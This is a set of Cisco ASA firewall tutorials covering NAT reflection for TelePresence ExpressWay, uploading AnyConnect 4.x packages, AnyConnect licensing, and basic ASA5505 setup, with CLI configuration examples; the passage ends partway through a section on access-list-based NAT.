The ASA 5500 Firewall series hardware modules offer a substantial number of network security enhancements making them ideal for corporate environments with sensitive data, in-house webservers and multiple VLANs & VPN networks. Their ability to provide advanced malware threat protection, URL filtering and IPS / IDS services make them the ideal upgrade for any ASA 5500 series Firewall adding true value to protecting and mitigating security threats.


Understand & Configure NAT Reflection, NAT Loopback, Hairpinning on Cisco ASA 5500-X for TelePresence ExpressWay and Other Applications

This article examines the concept of NAT Reflection, also known as NAT Loopback or Hairpinning, and shows how to configure a Cisco ASA Firewall, running ASA version 8.2 and earlier or ASA version 8.3 and later, to support NAT Reflection. NAT Reflection is a NAT technique used when devices on the internal network (LAN) need to access a server located in a DMZ zone using its public IP address.

What’s interesting is that NAT Reflection is not supported by all firewall appliances; Cisco ASA Firewalls, however, fully support it, making any NAT scenario possible. NAT Reflection is also seen in implementations of Cisco’s Telepresence systems, where the ExpressWay-C server on the internal network needs to communicate with the ExpressWay-E server in the DMZ zone using its public IP address.

Note: Users seeking additional information on Network Address Translation concepts can visit our dedicated NAT Section that covers NAT in great depth.

Single 3-Port/Leg Firewall DMZ With One LAN Interface ExpressWay-E Server

In the example below, ExpressWay-C with IP address 192.168.1.50 needs to access ExpressWay-E (DMZ zone, IP address 192.168.5.5) using its public IP address of 203.40.40.5. This type of setup also happens to be one of the two most popular configurations:


Figure 1. NAT Reflection on a 3-Port ASA Firewall with Cisco Telepresence (ExpressWay-C & ExpressWay-E)

ExpressWay-C packets traversing the ASA Firewall destined to ExpressWay-E’s public IP address will have the following transformation thanks to the NAT Reflection configuration:

  • Destination IP address 203.40.40.5 is replaced with Destination IP address 192.168.5.5 – ExpressWay-E’s private IP address. This is also known as Destination NAT (DNAT).
  • The Source IP address 192.168.1.50 (ExpressWay-C) is replaced with Source IP address 192.168.5.1 – ASA’s DMZ interface IP address. This is also known as Source NAT (SNAT).

When ExpressWay-C packets arrive to the ExpressWay-E server, they will have the following source & destination IP address: Source IP: 192.168.5.1, Destination IP: 192.168.5.5

Translation of the source IP address (SNAT) of these packets (192.168.1.50 to 192.168.5.1) is generally optional, however it is specifically required for the Cisco ExpressWay setup. The configuration commands for the above setup are as follows:

For ASA Versions 8.3 and later:

object network obj-192.168.1.50
host 192.168.1.50

!
object network obj-192.168.5.5
host 192.168.5.5

!
object network obj-203.40.40.5
host 203.40.40.5

!
nat (inside,DMZ) source static obj-192.168.1.50 interface destination static
obj-203.40.40.5 obj-192.168.5.5


WARNING: All traffic destined to the IP address of the DMZ interface is being redirected.
WARNING: Users may not be able to access any service enabled on the DMZ interface.

NOTE: After the NAT command is applied you will receive the two above warning messages.

The last line in our ASA configuration performs Source NAT and Destination NAT in one command.

For ASA Versions 8.2 and earlier:

access-list INT-DMZ-IN extended permit ip host 192.168.1.50 host 203.40.40.5
static (inside,DMZ) interface access-list INT-DMZ-IN

!
access-list INT-DMZ-IN extended permit ip host 192.168.5.5 host 192.168.5.1
static (DMZ,inside) 203.40.40.5 access-list INT-DMZ-IN

As shown, there are two levels of NAT occurring for this scenario, both required by the Cisco Telepresence - ExpressWay infrastructure.

Dual 2-Port/Leg Firewalls DMZ With One LAN Interface ExpressWay-E Server

The second most popular setup involves two firewalls, one protecting our LAN (Firewall 2) and one protecting our DMZ (Firewall 1) while also limiting traffic hitting our LAN firewall:


Figure 2. NAT Reflection on a 2-Port ASA Firewall with DMZ for Cisco Telepresence (ExpressWay-C & ExpressWay-E)

In this slightly more complex setup, Firewall No.1 is where we apply NAT Reflection to inbound traffic from ExpressWay-C server destined to ExpressWay-E’s public IP address 203.40.40.5.

It’s important to note that returning traffic from ExpressWay-E to ExpressWay-C will have to pass through Firewall 1 again. If an attempt is made to direct returning traffic through Firewall 2 (bypassing Firewall 1) e.g via a static route, then we’ll have a condition known as Asymmetric Routing, possibly causing disruptions in the communication between the two servers.

Note: Asymmetric Routing occurs when returning traffic between two hosts does not follow the same route as the original traffic. This condition is not favored by Firewalls as they track traffic and expect returning traffic to follow the same path originally taken.

Firewall No.1 is also configured with a one-to-one static NAT mapping, directing all traffic destined to 203.40.40.5 to 192.168.5.5.
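For illustration only, and assuming Firewall No.1’s interfaces are named DMZ and outside (the interface and object names here are our own, not taken from the original configuration), this one-to-one mapping could be expressed on ASA 8.3 and later with a simple auto-NAT statement:

object network obj-192.168.5.5
host 192.168.5.5
nat (DMZ,outside) static 203.40.40.5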

ExpressWay-C packets traversing ASA Firewall 1 destined to ExpressWay-E’s public IP address will have the following transformation thanks to the NAT Reflection configuration:

  • Destination IP address 203.40.40.5 is replaced with Destination IP address 192.168.5.5 – ExpressWay-E’s private IP address. This is also known as Destination NAT (DNAT).
  • The Source IP address 192.168.1.50 (ExpressWay-C) is replaced with Source IP address 192.168.5.2 – Firewall 1’s internal interface IP address. This is also known as Source NAT (SNAT).

Firewall 2 does not perform any NAT for traffic between ExpressWay-C and ExpressWay-E. When ExpressWay-C packets arrive to the ExpressWay-E server, they will have the following source & destination IP address: Source IP: 192.168.5.2, Destination IP: 192.168.5.5

Translation of the source IP address (SNAT) of these packets (192.168.1.50 to 192.168.5.2) is generally optional, however it is specifically required for the Cisco ExpressWay setup. The configuration commands for the above setup are as follows:

For ASA Versions 8.3 and later:

object network obj-192.168.1.50
host 192.168.1.50

!
object network obj-192.168.5.5
host 192.168.5.5

!
object network obj-203.40.40.5
host 203.40.40.5

!
nat (inside,DMZ) source static obj-192.168.1.50 interface destination static
obj-203.40.40.5 obj-192.168.5.5


WARNING: All traffic destined to the IP address of the DMZ interface is being redirected.
WARNING: Users may not be able to access any service enabled on the DMZ interface.

NOTE: After the NAT command is applied you will receive the two above warning messages.

The last line in our ASA v8.3 and later configuration performs Source NAT and Destination NAT in one command.

For ASA Versions 8.2 and earlier:

access-list INT-DMZ-IN extended permit ip host 192.168.1.50 host 203.40.40.5
static (inside,DMZ) interface access-list INT-DMZ-IN

!
access-list INT-DMZ-IN extended permit ip host 192.168.5.5 host 192.168.5.1
static (DMZ,inside) 203.40.40.5 access-list INT-DMZ-IN

Summary

NAT Reflection (NAT Loopback or Hairpinning) is a fairly new NAT concept to most, but as we’ve seen it’s an easy one to understand. Implementations of NAT Reflection are becoming increasingly popular due to the new and complex technologies that require this type of NAT functionality, Telepresence and video conferencing being among them. We covered NAT Reflection for the two most popular firewall topologies, including diagrams and ASA Firewall configuration commands.


Upgrading - Uploading AnyConnect Secure Mobility Client v4.x SSL VPN on Cisco ASA 5506-X, 5508-X, 5512-X, 5515-X, 5516-X, 5525-X, 5545-X, 5555-X, 5585-X

This article will show how to download and upload the newer AnyConnect 4.x VPN clients to your Cisco ASA Firewall appliance (5500 & 5500-X Series) and configure WebVPN so that the newer AnyConnect VPN client is used and distributed to the remote VPN clients.

The Cisco AnyConnect SSL VPN has become the VPN standard for Cisco equipment, replacing the older Cisco IPSec VPN Client. With the introduction of the newer 4.x AnyConnect, Cisco has made dramatic changes to their licensing and features supported. Our Cisco AnyConnect 4.x Licensing article explains the differences with the newer 4.x licensing and has all the details to help organizations of any size migrate from 3.x AnyConnect to 4.x. You’ll also find the necessary Cisco ordering codes along with their caveats.


Figure 1. Cisco AnyConnect v4.x

The latest AnyConnect client at the time of writing is version 4.2.02075, which is available for Cisco customers with AnyConnect Plus or Apex licenses. Cisco provides both head-end and standalone installer files. The head-end files (.pkg extension) are deployed on the Cisco ASA Firewall and automatically downloaded by the VPN clients once authenticated via the web browser.

Uploading AnyConnect Secure Mobility Packages To The ASA Firewall

Images can be uploaded to the Cisco ASA Firewall via a standard tftp client using the copy tftp flash: command:

ASA-5506X# copy tftp flash:
Address or name of remote host []? 192.168.10.54
Source filename []? anyconnect-win-4.2.02075-k9.pkg
Destination filename [anyconnect-win-4.2.02075-k9.pkg]? [Hit Enter to keep same filename]
Accessing tftp://192.168.10.54/anyconnect-win-4.2.02075-k9.pkg...!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Writing file disk0:/anyconnect-win-4.2.02075-k9.pkg !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
INFO: No digital signature found
 
19426316 bytes copied in 85.820 secs (228544 bytes/sec)

We repeat the same command until all three files have been uploaded so we can fully support Windows, Linux and Mac OS clients.

Using the dir command at the end of the process confirms all files have been successfully uploaded to our ASA Firewall:

ASA-5506X# dir
Directory of disk0:/
97     -rwx 69454656     18:01:00 Aug 04 2015 asa941-lfbff-k8.SPA
98     -rwx 26350916     18:01:34 Aug 04 2015 asdm-741.bin
99     -rwx 33           04:09:03 Feb 27 2016 .boot_string
11     drwx 4096         18:04:04 Aug 04 2015 log
22     drwx 4096         18:05:10 Aug 04 2015 crypto_archive
23     drwx 4096         18:05:30 Aug 04 2015 coredumpinfo
100   -rwx 41836544     18:10:02 Aug 04 2015 asasfr-5500x-boot-5.4.1-211.img
103   -rwx 19426316     06:58:37 Feb 27 2016 anyconnect-win-4.2.02075-k9.pkg
104   -rwx 12996288     07:01:17 Feb 27 2016 anyconnect-linux-64-4.2.02075-k9.pkg
105   -rwx 17519719     07:04:26 Feb 27 2016 anyconnect-macosx-i386-4.2.02075-k9.pkg
7859437568 bytes total (4448530432 bytes free)
 
ASA-5506X#

Registering The New AnyConnect Packages

Assuming AnyConnect is already configured on your ASA Firewall, registering the new packages is a very simple process. In the near future, we’ll be including a full guide on how to setup AnyConnect Secure Mobility on Cisco ASA Firewalls.

Enter configuration mode and in the webvpn section add the following commands:

ASA-5506X(config)# webvpn
ASA-5506X(config-webvpn)# anyconnect image disk0:/anyconnect-win-4.2.02075-k9.pkg 1
ASA-5506X(config-webvpn)# anyconnect image disk0:/anyconnect-linux-64-4.2.02075-k9.pkg 2
ASA-5506X(config-webvpn)# anyconnect image disk0:/anyconnect-macosx-i386-4.2.02075-k9.pkg 3
ASA-5506X(config-webvpn)# anyconnect enable

When dealing with multiple clients (supported platforms) of AnyConnect, assign an order to the client images using the numbers (1, 2, 3) at the end of each package command as shown above.

Previous versions of AnyConnect packages (.pkg) can be removed from the configuration by using the no anyconnect image disk0:/anyconnect-win-xxxxx-k9.pkg command.
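For example, the removal is performed from the same webvpn context (substitute the old package’s actual filename for the xxxxx placeholder):

ASA-5506X(config)# webvpn
ASA-5506X(config-webvpn)# no anyconnect image disk0:/anyconnect-win-xxxxx-k9.pkg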

Verifying The New AnyConnect Packages

As a final step, we can verify that the AnyConnect packages have been successfully installed using the show webvpn anyconnect command:

ASA-5506X# show webvpn anyconnect
 
1. disk0:/anyconnect-win-4.2.02075-k9.pkg 1 dyn-regex=/Windows NT/
CISCO STC win2k+
4,2,02075
Hostscan Version 4.2.02075
Wed 02/17/2016 23:34:33.75
 
2. disk0:/anyconnect-linux-64-4.2.02075-k9.pkg 2 dyn-regex=/Linux x86_64/
CISCO STC Linux_64
4.2.02075
Wed Feb 17 23:03:53 EST 2016
 
3. disk0:/anyconnect-macosx-i386-4.2.02075-k9.pkg 3 dyn-regex=/Intel Mac OS X/
CISCO STC Darwin_i386
4.2.02075
Wed Feb 17 23:59:03 EST 2016
 
3 AnyConnect Client(s) installed

This completes the upgrade process of AnyConnect Secure Mobility Client on an ASA Firewall Security appliance. We saw all CLI commands involved to upload and register the new AnyConnect packages, remove the old AnyConnect packages and finally verify the packages are correctly registered for usage.


Demystifying Cisco AnyConnect 4.x Licensing. Plus, Plus Perpetual, Apex & Migration Licenses for Cisco IOS Routers & ASA Firewalls (5500/5500-X Series). Supported Operating Systems & Ordering Guide

In late 2014, Cisco announced the new licensing model for the latest AnyConnect Secure Mobility client v4.x. With this new version, Cisco introduced a number of new features, but also simplified the licensing model which was somewhat confusing. In this article, we will take a look at the new AnyConnect 4.x licenses which consist of: AnyConnect Plus license, AnyConnect Plus Perpetual license and AnyConnect Apex license.
 
We will also show how the new licenses map to the older AnyConnect Essentials and AnyConnect Premium license, plus the available migration paths. Finally, we also take a look at Cisco’s Software Application Support (SAS) and Software Application Support plus Upgrade (SASU), which are required when purchasing AnyConnect.

All AnyConnect licenses prior to version 4 had the AnyConnect Essentials and Premium licensing scheme. The newer v4.x AnyConnect licenses now have one of the three licensing options:

  • Cisco AnyConnect Plus License (Subscription Based)
  • Cisco AnyConnect Plus Perpetual License (Permanent – no subscription)
  • Cisco AnyConnect Apex License (Subscription Based)

With the new AnyConnect licenses, Cisco has moved to a subscription-based licensing model, which means customers will unfortunately need to fork out more money in the long run. The Plus Perpetual license, on the other hand, allows Cisco customers to purchase a one-time license, however it costs significantly more than the subscription-based license.

We should also note that AnyConnect 4.0 is not licensed based on simultaneous connections (like the previous AnyConnect 3.x), but is now user-based. This means a user connecting via his smartphone and laptop simultaneously will only occupy a single license.

Since the newer AnyConnect licenses are subscription-based, Cisco states that if the subscription expires and is not renewed, the licenses will stop working.
 
Cisco AnyConnect Secure Mobility Client 4.0 supports the following operating systems:

  • Windows 8.1 (32bit & 64Bit)
  • Windows 8 (32bit & 64Bit)
  • Windows 7 (32bit & 64Bit)
  • Linux Ubuntu 12.X 64Bit
  • Linux RedHat 6 64Bit
  • Mac OS X 10.10 – 10.8

As expected, Windows XP is no longer supported.

Let’s take a look at each license feature and how the older AnyConnect Essentials and Premium licenses map to the newer AnyConnect Plus and Apex licenses:


Figure 1. Mapping AnyConnect 3.x Essentials & Premium to AnyConnect 4.x Plus & Apex


Cisco AnyConnect Plus License (Old Essentials License) 5, 3 or 1-Year Term

The AnyConnect Plus License is a subscription-based license with the option of a 5, 3 or 1-year renewable subscription and supports the following features:

  • VPN Support for Devices. Includes Workstations and Laptops.
  • Secure Mobility Client support (AnyConnect Mobile). Includes mobile phones, tablets etc.
  • SSL VPN (Client-based)
  • Per-app VPN. Authorize specific applications to access the VPN. Supports specific devices and software.
  • Basic endpoint context collection
  • IEEE 802.1X Windows supplicant
  • Cisco Cloud Web Security agent for Windows & Mac OS X platforms
  • Cloud Web Security and Web Security Appliance support
  • Cisco Advanced Malware Protection for Endpoints Enabler. AMP for Endpoints is licensed separately
  • Network Access Manager
  • Federal Information Processing Standards (FIPS) Compliance

It is worth noting that AnyConnect 3.x required the purchase of Essentials or Premium license + AnyConnect Mobile (L-ASA-AC-M-55xx) in order to support mobile devices (Smartphones, Tablets etc.).  AnyConnect Mobile is now integrated into the new AnyConnect Plus license.

Cisco AnyConnect Plus Perpetual (permanent) License

The AnyConnect Plus Perpetual license supports the same features as the Plus license above, but with the difference that it is a permanent license.
 
The customer purchases it once and there is no subscription service; however, it is still required to purchase a Software Application Support plus Upgrade (SASU) contract. This is covered in detail at the end of this article.

Customers considering the Plus Perpetual license should compare costs with the subscription-based license to see if it is worth going down that path.

Cisco AnyConnect Apex License (Old Premium License)

The AnyConnect Apex License includes all offerings in the AnyConnect Plus license plus the following:

  • All AnyConnect Plus features
  • Clientless (browser-based) VPN Termination on the Cisco ASA Firewall appliance
  • VPN compliance and posture agent in conjunction with the Cisco ASA Firewall appliance
  • Unified compliance and posture agent in conjunction with the Cisco Identity Services Engine (ISE) 1.3 or later
  • Support for stronger Next-generation encryption (Suite B)

The AnyConnect Apex license is only available as a subscription-based license. There is no perpetual license available.
 
The Next Generation Suite B encryption supports the following stronger encryption standards:

  • Advanced Encryption Standard (AES) with key sizes of 128 and 256 bits.
  • Elliptic Curve Digital Signature Algorithm (ECDSA) — digital signatures
  • Elliptic Curve Diffie–Hellman (ECDH) — key exchange agreement
  • Secure Hash Algorithm 2 (SHA-256 and SHA-384) — message digest

Purchasing AnyConnect Licenses & Important Notes – Understand SAS & SASU For AnyConnect

While AnyConnect licensing has been simplified, there are still a few important areas we must be aware of to avoid licensing and future upgrade issues.

Before we dive in, we need to clarify what Software Application Support (SAS) and Software Application Support plus Upgrade (SASU) is because they are required with AnyConnect licenses:

SAS: Provides access to Cisco’s latest software application updates (e.g. AnyConnect, VPN Client software). SAS also includes minor release updates (e.g. an AnyConnect 4.0 to 4.1 upgrade), 24-hour technical assistance from Cisco TAC (only for the specific software/application) and unrestricted access to online tools.

SASU: Includes everything provided in SAS, plus major upgrade releases of the software, e.g. from AnyConnect 4.x to AnyConnect 5.x (when available).

When purchasing AnyConnect Plus or AnyConnect Apex subscription-based licenses, SASU is already included and is not required to be purchased separately.
 
When purchasing AnyConnect Plus Perpetual licenses, SASU must be purchased.  To do so, you need to order the following:

  1. Order the Cisco AnyConnect Plus Perpetual License (L-AC-PLS-P-G) which has no cost ($0)
  2. Add the User License required e.g Cisco AnyConnect Plus - Perpetual License/25 users (AC-PLS-P-25-S)
  3. Add the SASU product for the selected User License (AC-PLS-P-25-S). In our example the SASU product will be CON-SAU-ACPL25. It is also necessary to specify the duration of the contract (1 – 60 months). The longer the duration, the larger the cost.

Full product ID’s for AnyConnect Plus, Plus Perpetual and Apex licenses along with all subscriptions and SASU products are available in the Cisco AnyConnect Ordering Guide freely available from our Cisco Product Datasheets & Guides section.

Below we are including a list of the maximum VPN peers/sessions supported by each ASA Firewall appliance to help customers decide the amount of AnyConnect licenses they require:

Cisco ASA Maximum VPN Peers / Sessions

5505 = 25
5510 = 250
5520 = 750
5540 = 5,000
5550 = 5,000
5580 = 10,000

Cisco ASA Next Generation Platform (X) VPN Peers / Sessions

5512-X = 250
5515-X = 250
5525-X = 750
5545-X = 2,500
5555-X = 5,000
5585-X = 10,000

Cisco AnyConnect Plus, AnyConnect Apex Migration Licenses

Cisco customers who purchased AnyConnect Essentials, Premium and Shared Premium licenses prior to March 2 2015, can transition to the new Plus/Apex licenses by ordering the Plus/Apex Migration subscription licenses for 5, 3 or 1-year term.

The last day to purchase AnyConnect Migration licenses is 31st of December 2015.

The AnyConnect Migration license product IDs are available in the Cisco AnyConnect Ordering Guide freely available from our Cisco Product Datasheets & Guides section.

This article explained the new Cisco AnyConnect 4.x licensing model. We analysed the three new simplified licensing options (AnyConnect Plus, Plus Perpetual and AnyConnect Apex), including the features each license supports and how they map to the old Essentials and Premium licenses. We also covered the operating systems supported by AnyConnect 4.x and the ordering product IDs, analysed the SASU services required with AnyConnect Plus Perpetual and Migration licenses, and noted the maximum VPN sessions supported by each ASA Firewall appliance.


Cisco ASA5500 (5505, 5510, 5520, etc) Series Firewall Security Appliance Startup Configuration & Basic Concepts

The Cisco ASA 5500 series security appliances have been around for quite some time and are amongst the most popular hardware firewalls available in the market. Today Firewall.cx takes a look at how to easily set up a Cisco ASA5500 series firewall to perform basic functions, more than enough to provide secure & restricted access to the Internet, securely access and manage the ASA Firewall, and more.

While many consider Cisco ASA Firewalls complex and difficult devices to configure, Firewall.cx aims to break that myth and show how easily you can set up an ASA Firewall to deliver basic and advanced functionality. We’ve done it with other Cisco technologies and devices, and we’ll do it again :)

The table below provides a brief comparison between the different ASA5500 series security appliances:

| Feature | Cisco ASA 5505 | Cisco ASA 5510 | Cisco ASA 5520 | Cisco ASA 5540 | Cisco ASA 5550 |
|---|---|---|---|---|---|
| Users/Nodes | 10, 50, or unlimited | Unlimited | Unlimited | Unlimited | Unlimited |
| Firewall Throughput | Up to 150 Mbps | Up to 300 Mbps | Up to 450 Mbps | Up to 650 Mbps | Up to 1.2 Gbps |
| Maximum Firewall and IPS Throughput | Up to 150 Mbps with AIP-SSC-5 | Up to 150 Mbps with AIP-SSM-10; up to 300 Mbps with AIP-SSM-20 | Up to 225 Mbps with AIP-SSM-10; up to 375 Mbps with AIP-SSM-20; up to 450 Mbps with AIP-SSM-40 | Up to 500 Mbps with AIP-SSM-20; up to 650 Mbps with AIP-SSM-40 | Not available |
| 3DES/AES VPN Throughput*** | Up to 100 Mbps | Up to 170 Mbps | Up to 225 Mbps | Up to 325 Mbps | Up to 425 Mbps |
| IPsec VPN Peers | 10; 25 | 250 | 750 | 5000 | 5000 |
| Premium AnyConnect VPN Peers* (Included/Maximum) | 2/25 | 2/250 | 2/750 | 2/2500 | 2/5000 |
| Concurrent Connections | 10,000; 25,000* | 50,000; 130,000* | 280,000 | 400,000 | 650,000 |
| New Connections/Second | 4000 | 9000 | 12,000 | 25,000 | 33,000 |
| Integrated Network Ports | 8-port Fast Ethernet switch (including 2 PoE ports) | 5 Fast Ethernet ports; 2 Gigabit Ethernet + 3 Fast Ethernet ports* | 4 Gigabit Ethernet, 1 Fast Ethernet | 4 Gigabit Ethernet, 1 Fast Ethernet | 8 Gigabit Ethernet, 4 SFP Fiber, 1 Fast Ethernet |
| Virtual Interfaces (VLANs) | 3 (no trunking support)/20 (with trunking support)* | 50/100* | 150 | 200 | 400 |

Users can also download the complete technical datasheet for the Cisco ASA 5500 series firewalls by visiting our Cisco Product Datasheet & Guides Download section.

Perhaps one of the most important points, especially for an engineer with limited experience, is that configuring the smaller ASA 5505 Firewall does not really differ from configuring the larger ASA5520 Firewall. The same steps are required to setup pretty much all ASA 5500 series Firewalls – which is Great News!


The main differences besides the licenses, which enable or disable features, are the physical interfaces of each ASA model (mainly between the ASA 5505 and the larger 5510/5520) and possibly modules that might be installed. In any case, we should keep in mind that if we are able to configure a small ASA5505 then configuring the larger models won’t be an issue.

At the time of writing, Firewall.cx had a Cisco ASA5505 at hand, so we decided to put it to good use for this article. Do note, however, that the commands and configuration philosophy are the same across all ASA5500 series security appliances.

Note: ASA software version 8.3.0 and above use different NAT configuration commands. This article provides both old style (up to v8.2.5) and new style (v8.3 onwards) NAT configuration commands.

ASA5500 Series Configuration Check-List

We’ve created a simple configuration check-list that will help us keep track of the configured services on our ASA Firewall. Here is the list of items that will be covered in this article:

  • Erase existing configuration
  • Configure Hostname, Users, Enable password & Disable Anonymous Reporting
  • Configure interface IP addresses or Vlan IP addresses (ASA5505) & Descriptions
  • Setup Inside (private) & Outside (public) Interfaces
  • Configure default route (default Gateway) & static routes
  • Configure Network Address Translation (NAT) for Internal Networks
  • Configure ASA DHCP Server
  • Configure AAA authentication for local database user authentication
  • Enable HTTP Management for inside interface
  • Enable SSH & Telnet Management for inside and outside interfaces
  • Create, configure and apply TCP/UDP Object-Groups to firewall access lists
  • Configuration of access-lists for ICMP packets to the Internet
  • Apply Firewall access lists to ‘inside’ and ‘outside’ interfaces
  • Configure logging/debugging of events and errors

Note: it is highly advisable to frequently save the ASA configuration to ensure no work is lost in the event of a power failure or accidental restart.

Saving the configuration can be easily done using the write memory command:

ASA5505(config)# write memory
Building configuration...
Cryptochecksum: c0aee665 598d7cd3 7fbfe1a5 a2d40ab1
3270 bytes copied in 1.520 secs (3270 bytes/sec)
[OK]

Erasing Existing Configuration

This first step is optional as it will erase the firewall’s configuration. If the firewall has been previously configured or used it is a good idea to start off with the factory defaults. If we are not certain, we prefer to wipe it clean and start from scratch.

Once the configuration is deleted we need to force a reboot. Take note that it’s important not to save the system config when prompted, so that the running-config is not copied to the startup-config; otherwise we’ll have to start this process again:

ciscoasa(config)# write erase
Erase configuration in flash memory? [confirm]
[OK]
ciscoasa(config)# reload
System config has been modified. Save? [Y]es/[N]o:  N
Proceed with reload? [confirm]
ciscoasa(config)#
***
*** --- START GRACEFUL SHUTDOWN ---
Shutting down isakmp
Shutting down webvpn
Shutting down File system
***
*** --- SHUTDOWN NOW ---
Process shutdown finished
Rebooting.....

Configure Hostname, Users, 'Enable' Password & Disable Anonymous Reporting

Next, we need to configure the enable password, which is required for privileged exec mode access, and then the user accounts that will have access to the firewall.

The ASA Firewall won’t ask for a username/password the next time we log in; however, the default enable password of ‘cisco’ will be required to gain access to privileged mode:

Ciscoasa> enable
Password: cisco
ciscoasa#  configure terminal
ciscoasa(config)#
***************************** NOTICE *****************************
Help to improve the ASA platform by enabling anonymous reporting,
which allows Cisco to securely receive minimal error and health
information from the device. To learn more about this feature,
please visit: http://www.cisco.com/go/smartcall

Would you like to enable anonymous error reporting to help improve
the product? [Y]es, [N]o, [A]sk later: N

In the future, if you would like to enable this feature,
issue the command "call-home reporting anonymous".
Please remember to save your configuration.

At this point we need to note that when starting off with the factory default configuration, as soon as we enter the ‘configure terminal’ command, the system will ask if we would like to enable Cisco’s call-home reporting feature. We declined the offer and continued with our setup:

ciscoasa(config)# hostname ASA5505
ASA5505(config)# enable password firewall.cx
ASA5505(config)# username admin password s1jw$528ds2 privilege 15

The privilege 15 parameter at the end of the command line ensures the system is aware that this is an account with full privileges and has access to all configuration commands including erasing the configuration and files on the device’s flash disk, such as the operating system.
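For comparison, and purely as an illustrative sketch (this account and its password are examples, not part of our setup), a restricted account can be created by specifying a lower privilege level:

ASA5505(config)# username helpdesk password N0tS0Secr3t privilege 5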

Configure Interface IP addresses / VLAN IP Addresses & Descriptions

Depending on the ASA appliance we have, we can either configure the physical interfaces (inside/outside) with IP addresses, as is usually done on the ASA5510 and larger models, or create VLAN interfaces (inside/outside) and configure them with IP addresses, as is usually done on the smaller ASA5505.

In many cases network engineers use VLAN interfaces on the larger ASA5500 models, however, this depends on the licensing capabilities of the device, existing network setup and more.

In the case of the ASA5505 we must use VLAN interfaces, which are configured with their appropriate IP addresses and then (next step) characterised as inside (private) or outside (public) interfaces:

ASA5505(config)# interface vlan 1
ASA5505(config-if)# description Private-Interface
ASA5505(config-if)# ip address 10.71.0.1 255.255.255.0
ASA5505(config-if)# no shutdown
!
ASA5505(config)# interface vlan 2
ASA5505(config-if)# description Public-Interface
ASA5505(config-if)# ip address 192.168.3.50 255.255.255.0
ASA5505(config-if)# no shutdown
!
ASA5505(config)# interface ethernet 0/0
ASA5505(config-if)# switchport access vlan 2
ASA5505(config-if)# no shutdown

Alternatively, the Public interface (VLAN2) can be configured to obtain its IP address automatically via DHCP with the following commands:

ASA5505(config)# interface vlan 2
ASA5505(config-if)# description Public-Interface
ASA5505(config-if)# ip address dhcp setroute
ASA5505(config-if)# no shutdown

The setroute parameter at the end of the command will ensure the ASA Firewall sets its default route (gateway) using the default gateway parameter the DHCP server provides.

After configuring VLAN1 & VLAN2 with the appropriate IP addresses, we configured ethernet 0/0 as an access link for VLAN2 so we can use it as a physical public interface. Out of the 8 Ethernet interfaces the ASA5505 has, at least one must be set with the switchport access vlan 2 command, otherwise there won’t be any physical public interface on the ASA for our frontend router to connect to. Ethernet ports 0/1 to 0/7 must also be configured with the no shutdown command in order to make them operational. All of these ports are, by default, access links for VLAN1. The configuration commands for the first two Ethernet interfaces are provided below, as the configuration is identical for all:

ASA5505(config)# interface ethernet 0/1
ASA5505(config-if)# no shutdown
ASA5505(config-if)# interface ethernet 0/2
ASA5505(config-if)# no shutdown

Setup Inside (private) & Outside (public) Interfaces

Next, we must designate the Inside (private) and Outside (public) interfaces. This step is essential and will help the ASA Firewall understand which interface is connected to the trusted (private) and untrusted (public) network:

ASA5505(config)# interface vlan 1
ASA5505(config-if)# nameif inside
INFO: Security level for "inside" set to 100 by default.
!
ASA5505(config)# interface vlan 2
ASA5505(config-if)# nameif outside
INFO: Security level for "outside" set to 0 by default.

The ASA Firewall will automatically set the security level to 100 for inside interfaces and 0 for outside interfaces. Traffic can flow from higher security levels to lower ones (private to public), but not the other way around (public to private) unless permitted by an access list.

To change the security-level of an interface use the security-level xxx command by substituting xxx with a number from 0 to 100. The higher the number, the higher the security level.  DMZ interfaces are usually configured with a security level of 50.
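As an illustrative sketch only (the interface name, IP address and VLAN number below are examples, and a third VLAN interface may require an appropriate license on the ASA5505), a DMZ interface would be configured along these lines:

ASA5505(config)# interface vlan 3
ASA5505(config-if)# nameif DMZ
ASA5505(config-if)# security-level 50
ASA5505(config-if)# ip address 192.168.10.1 255.255.255.0
ASA5505(config-if)# no shutdown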

It is extremely important the necessary caution is taken when selecting and applying the inside/outside interfaces on any ASA Firewall.

Configure Default Route (default gateway) & Static Routes

The default route configuration command is necessary for the ASA Firewall to route packets outside the network via the next hop, usually a router. In case the public interface (VLAN2) is configured using the ip address dhcp setroute command, configuration of the default gateway is not required.

ASA5505(config)# route outside 0.0.0.0 0.0.0.0 192.168.3.1

At this point, it’s a good idea to try testing the next-hop router and confirm the ASA Firewall can reach it:

ASA5505(config)# ping 192.168.3.1
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.3.1, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/1 ms

For networks with multiple internal VLANs, it is necessary to configure static routes so the ASA Firewall knows how to reach them. Usually these networks are reached via a Layer 3 switch or an internal router. For our example, we’ll assume we have two additional networks, 10.75.0.0/24 and 10.76.0.0/24, which need Internet access and are reachable via a Layer 3 device with IP address 10.71.0.100:

ASA5505(config)# route inside 10.75.0.0 255.255.255.0 10.71.0.100
ASA5505(config)# route inside 10.76.0.0 255.255.255.0 10.71.0.100

Configure Network Address Translation (NAT) For Internal Networks

This is the last step required to successfully provide Internet access to our internal networks. Network Address Translation is essential to masquerade our internal network using the single IP address our Public interface has been configured with.  Network Address Translation, along with all its variations (Static, Dynamic etc), is covered in great depth in our popular Network Address Translation section.

We should note at this point that NAT configuration has slightly changed with ASA software version 8.3 and above. We will provide both commands to cover installations with software version up to v8.2.5 and from v8.3 and above.

The following commands apply to ASA appliances with software version up to 8.2.5:

ASA5505(config)# global (outside) 1 interface
INFO: outside interface address added to PAT pool
ASA5505(config)# nat (inside) 1 10.71.0.0 255.255.255.0
ASA5505(config)# nat (inside) 1 10.75.0.0 255.255.255.0
ASA5505(config)# nat (inside) 1 10.76.0.0 255.255.255.0

In the above configuration, the ASA Firewall is instructed to NAT all internal networks using NAT group 1. The number ‘1’ identifies the NAT group used for the translation process between the inside and outside interfaces.

The global (outside) 1 interface command instructs the ASA Firewall to perform NAT using the IP address assigned to the outside interface.
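Once internal hosts begin generating traffic, the active translations can be verified with the show xlate command, which lists the current NAT/PAT entries and their count:

ASA5505# show xlate
ASA5505# show xlate count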

Another method of configuring NAT is with the use of access lists. In this case, we define the internal IP addresses to be NAT’ed with the use of access lists:

ASA5505(config)# access-list NAT-ACLs extended permit ip 10.71.0.0 255.255.255.0 any
ASA5505(config)# access-list NAT-ACLs extended permit ip 10.75.0.0 255.255.255.0 any
